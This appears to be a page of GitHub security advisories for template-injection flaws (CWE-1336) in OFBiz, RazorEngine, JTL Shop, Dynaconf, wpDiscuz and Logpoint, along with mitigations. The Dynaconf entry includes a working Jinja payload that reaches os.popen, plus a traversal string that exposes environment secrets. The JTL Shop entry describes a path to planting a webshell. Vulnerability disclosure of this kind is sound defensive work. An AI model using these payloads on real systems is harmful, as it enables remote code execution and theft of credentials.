"details": "Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz.\n\nThis issue affects Apache OFBiz: from 18.12.17 before 18.12.18.\u00a0\u00a0\n\nIt\u0027s a regression between 18.12.17 and 18.12.18.\nIn case you use something like that, which is not recommended!\nFor security, only official releases should be used.\n\nIn other words, if you use 18.12.17 you are still safe.\nThe version 18.12.17 is not a affected.\nBut something between 18.12.17 and 18.12.18 is.\n\nIn that case, users are recommended to upgrade to version 18.12.18, which fixes the issue.",
"id": "GHSA-p9r8-xjx7-v86q",
"modified": "2025-03-11T21:30:33Z",
"published": "2025-03-10T15:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26865"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/OFBIZ-12594"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/prb48ztk01bflyyjbl6p56wlcc1n5sz7"
},
{
"type": "WEB",
"url": "https://ofbiz.apache.org/download.html"
},
{
"type": "WEB",
"url": "https://ofbiz.apache.org/security.html"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/03/07/1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-PH3V-2HQ5-5QFQ
Vulnerability from github – Published: 2022-03-07 00:00 – Updated: 2025-03-26 15:32In the IsolatedRazorEngine component of Antaris RazorEngine through 4.5.1-alpha001, an attacker can execute arbitrary .NET code in a sandboxed environment (if users can externally control template contents). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "RazorEngine"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "4.5.1-alpha001"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-46703"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": true,
"github_reviewed_at": "2022-03-11T20:30:20Z",
"nvd_published_at": "2022-03-06T06:15:00Z",
"severity": "CRITICAL"
},
"details": "In the IsolatedRazorEngine component of Antaris RazorEngine through 4.5.1-alpha001, an attacker can execute arbitrary .NET code in a sandboxed environment (if users can externally control template contents). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.",
"id": "GHSA-ph3v-2hq5-5qfq",
"modified": "2025-03-26T15:32:24Z",
"published": "2022-03-07T00:00:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46703"
},
{
"type": "WEB",
"url": "https://github.com/Antaris/RazorEngine/issues/585"
},
{
"type": "PACKAGE",
"url": "https://github.com/Antaris/RazorEngine"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Code injection in RazorEngine"
}
GHSA-PXQ6-FR5M-FWH5
Vulnerability from github – Published: 2026-06-18 18:35 – Updated: 2026-06-18 18:35JTL Shop versions 5.2.0 through 5.7.1 contains a server-side template injection vulnerability that allows unauthenticated attackers to inject malicious template syntax due to unsanitized user-supplied input passed to the Smarty template engine. Attackers can exploit this flaw to read sensitive server-side values such as database credentials and encryption keys, and on versions 5.4.0 through 5.7.1, leverage registered Smarty modifiers including unserialize and file_get_contents to write a webshell to the web root and execute arbitrary commands as the web server user.
{
"affected": [],
"aliases": [
"CVE-2026-54390"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-18T18:16:19Z",
"severity": "CRITICAL"
},
"details": "JTL Shop versions 5.2.0 through 5.7.1 contains a server-side template injection vulnerability that allows unauthenticated attackers to inject malicious template syntax due to unsanitized user-supplied input passed to the Smarty template engine. Attackers can exploit this flaw to read sensitive server-side values such as database credentials and encryption keys, and on versions 5.4.0 through 5.7.1, leverage registered Smarty modifiers including unserialize and file_get_contents to write a webshell to the web root and execute arbitrary commands as the web server user.",
"id": "GHSA-pxq6-fr5m-fwh5",
"modified": "2026-06-18T18:35:25Z",
"published": "2026-06-18T18:35:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54390"
},
{
"type": "WEB",
"url": "https://forum.jtl-software.de/threads/jtl-shop-5-7-aktuell-5-7-2.246278"
},
{
"type": "WEB",
"url": "https://sansec.io/research/jtl-shop-ssti-rce"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/jtl-shop-server-side-template-injection-via-smarty-renderer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-PXRR-HQ57-Q35P
Vulnerability from github – Published: 2026-03-18 20:08 – Updated: 2026-04-14 21:59Summary
Dynaconf is vulnerable to Server-Side Template Injection (SSTI) due to unsafe template evaluation in the @jinja resolver. When the jinja2 package is installed, Dynaconf evaluates template expressions embedded in configuration values without a sandboxed environment.
If an attacker can influence configuration sources such as: environment variables .env files container environment configuration CI/CD secrets they can execute arbitrary OS commands on the host system. In addition, the @format resolver allows object graph traversal, which may expose sensitive runtime objects and environment variables.
Details
The vulnerability arises because Dynaconf's string resolvers lack proper security boundaries.
- @jinja Resolver The @jinja resolver renders templates using full Jinja2 evaluation. However, the rendering context is not sandboxed, which allows attackers to access Python's internal attributes. Using objects such as cycler, attackers can reach Python's globals and import the os module.
Example attack path cycler → init → globals → os → popen() This leads to arbitrary command execution.
- @format Resolver The @format resolver performs Python string formatting using internal objects. This allows attackers to traverse Python's object graph and access sensitive runtime objects. Example traversal: {this.class.init.globals[os].environ} This can expose
- API keys
- database credentials
- internal service tokens
- environment secrets
PoC
import os
from dynaconf import Dynaconf
# Malicious configuration injection
os.environ["DYNACONF_RCE"] = "@jinja {{ cycler.__init__.__globals__.os.popen('id').read() }}"
settings = Dynaconf()
print("[!] Command Execution Result:")
print(settings.RCE)
Impact
Successful exploitation allows attackers to: - Execute arbitrary OS commands on the host system - Access sensitive environment variables - Compromise application secrets - Fully compromise the running application process Because configuration values may originate from CI/CD pipelines, container orchestration systems, or environment injection, this vulnerability can become remotely exploitable in real-world deployments.
Remediation / Mitigation (Examples)
- Use Jinja2 sandbox for template rendering
from jinja2.sandbox import SandboxedEnvironment
env = SandboxedEnvironment()
template = env.from_string("{{ config_value }}")
safe_value = template.render(config_value=user_input)```
- Restrict @format usage to trusted values
safe_value = "{name}".format(name=trusted_name)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.2.12"
},
"package": {
"ecosystem": "PyPI",
"name": "dynaconf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.2.13"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33154"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-78",
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-18T20:08:06Z",
"nvd_published_at": "2026-03-20T21:17:15Z",
"severity": "HIGH"
},
"details": "### Summary\nDynaconf is vulnerable to Server-Side Template Injection (SSTI) due to unsafe template evaluation in the @jinja resolver.\nWhen the jinja2 package is installed, Dynaconf evaluates template expressions embedded in configuration values without a sandboxed environment.\n\nIf an attacker can influence configuration sources such as:\nenvironment variables\n.env files\ncontainer environment configuration\nCI/CD secrets\nthey can execute arbitrary OS commands on the host system.\nIn addition, the @format resolver allows object graph traversal, which may expose sensitive runtime objects and environment variables.\n\n### Details\nThe vulnerability arises because Dynaconf\u0027s string resolvers lack proper security boundaries.\n\n1. @jinja Resolver\nThe @jinja resolver renders templates using full Jinja2 evaluation.\nHowever, the rendering context is not sandboxed, which allows attackers to access Python\u0027s internal attributes.\nUsing objects such as cycler, attackers can reach Python\u0027s __globals__ and import the os module.\n\nExample attack path\ncycler\n \u2192 __init__\n \u2192 __globals__\n \u2192 os\n \u2192 popen()\nThis leads to arbitrary command execution.\n\n2. @format Resolver\nThe @format resolver performs Python string formatting using internal objects.\nThis allows attackers to traverse Python\u0027s object graph and access sensitive runtime objects.\nExample traversal:\n{this.__class__.__init__.__globals__[os].environ}\nThis can expose\n- API keys\n- database credentials\n- internal service tokens\n- environment secrets\n\n### PoC\n```\nimport os\nfrom dynaconf import Dynaconf\n# Malicious configuration injection\nos.environ[\"DYNACONF_RCE\"] = \"@jinja {{ cycler.__init__.__globals__.os.popen(\u0027id\u0027).read() }}\"\nsettings = Dynaconf()\nprint(\"[!] Command Execution Result:\")\nprint(settings.RCE)\n```\n### Impact\nSuccessful exploitation allows attackers to:\n- Execute arbitrary OS commands on the host system\n- Access sensitive environment variables\n- Compromise application secrets\n- Fully compromise the running application process\nBecause configuration values may originate from CI/CD pipelines, container orchestration systems, or environment injection, this vulnerability can become remotely exploitable in real-world deployments.\n\n\n### Remediation / Mitigation (Examples)\n\n1. Use Jinja2 sandbox for template rendering\n```\nfrom jinja2.sandbox import SandboxedEnvironment\nenv = SandboxedEnvironment()\ntemplate = env.from_string(\"{{ config_value }}\")\nsafe_value = template.render(config_value=user_input)```\n```\n2. Restrict @format usage to trusted values\n```\nsafe_value = \"{name}\".format(name=trusted_name)\n```",
"id": "GHSA-pxrr-hq57-q35p",
"modified": "2026-04-14T21:59:25Z",
"published": "2026-03-18T20:08:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/dynaconf/dynaconf/security/advisories/GHSA-pxrr-hq57-q35p"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33154"
},
{
"type": "WEB",
"url": "https://github.com/dynaconf/dynaconf/commit/2fbb45ee36b8c0caa5b924fe19f3c1a5e8603fa7"
},
{
"type": "PACKAGE",
"url": "https://github.com/dynaconf/dynaconf"
},
{
"type": "WEB",
"url": "https://github.com/dynaconf/dynaconf/releases/tag/3.2.13"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "dynaconf Affected by Remote Code Execution (RCE) via Insecure Template Evaluation in @jinja Resolver"
}
GHSA-Q226-8C4V-P73W
Vulnerability from github – Published: 2026-03-13 21:31 – Updated: 2026-04-22 21:31wpDiscuz before 7.6.47 contains a shortcode injection vulnerability that allows attackers to execute arbitrary shortcodes by including them in comment content sent via email notifications. Attackers can inject shortcodes like [contact-form-7] or [user_meta] in comments, which are executed server-side when the WpdiscuzHelperEmail class processes notifications through do_shortcode() before wp_mail().
{
"affected": [],
"aliases": [
"CVE-2026-22191"
],
"database_specific": {
"cwe_ids": [
"CWE-1336",
"CWE-94"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-13T19:54:09Z",
"severity": "MODERATE"
},
"details": "wpDiscuz before 7.6.47 contains a shortcode injection vulnerability that allows attackers to execute arbitrary shortcodes by including them in comment content sent via email notifications. Attackers can inject shortcodes like [contact-form-7] or [user_meta] in comments, which are executed server-side when the WpdiscuzHelperEmail class processes notifications through do_shortcode() before wp_mail().",
"id": "GHSA-q226-8c4v-p73w",
"modified": "2026-04-22T21:31:32Z",
"published": "2026-03-13T21:31:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22191"
},
{
"type": "WEB",
"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22191-POC.py"
},
{
"type": "WEB",
"url": "https://github.com/kmkz/Exploits/blob/master/2026/CVE-2026-22191-SicuroWeb-ATI-chain.txt"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/wpdiscuz"
},
{
"type": "WEB",
"url": "https://wordpress.org/plugins/wpdiscuz/#developers"
},
{
"type": "WEB",
"url": "https://www.beghelli.it"
},
{
"type": "WEB",
"url": "https://www.boffsec-services.com/posts/sicuroweb-cve-2026-22191"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/beghelli-sicuro24-sicuroweb-angularjs-template-injection"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/wpdiscuz-before-server-side-shortcode-injection-via-email-notifications"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-Q2GX-X2FM-C9FR
Vulnerability from github – Published: 2025-02-14 09:31 – Updated: 2025-02-14 09:31An issue was discovered in Logpoint AgentX before 1.5.0. A vulnerability caused by limited access controls allowed li-admin users to access sensitive information about AgentX Manager in a Logpoint deployment.
{
"affected": [],
"aliases": [
"CVE-2025-26789"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-14T08:15:31Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Logpoint AgentX before 1.5.0. A vulnerability caused by limited access controls allowed li-admin users to access sensitive information about AgentX Manager in a Logpoint deployment.",
"id": "GHSA-q2gx-x2fm-c9fr",
"modified": "2025-02-14T09:31:22Z",
"published": "2025-02-14T09:31:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-26789"
},
{
"type": "WEB",
"url": "https://servicedesk.logpoint.com/hc/en-us/articles/24749416515741-Unauthorized-information-access-due-to-inadequate-access-controls"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
Mitigation
Choose a template engine that offers a sandbox or restricted mode, or at least limits the power of any available expressions, function calls, or commands.
Mitigation
Use the template engine's sandbox or restricted mode, if available.
No CAPEC attack patterns related to this CWE.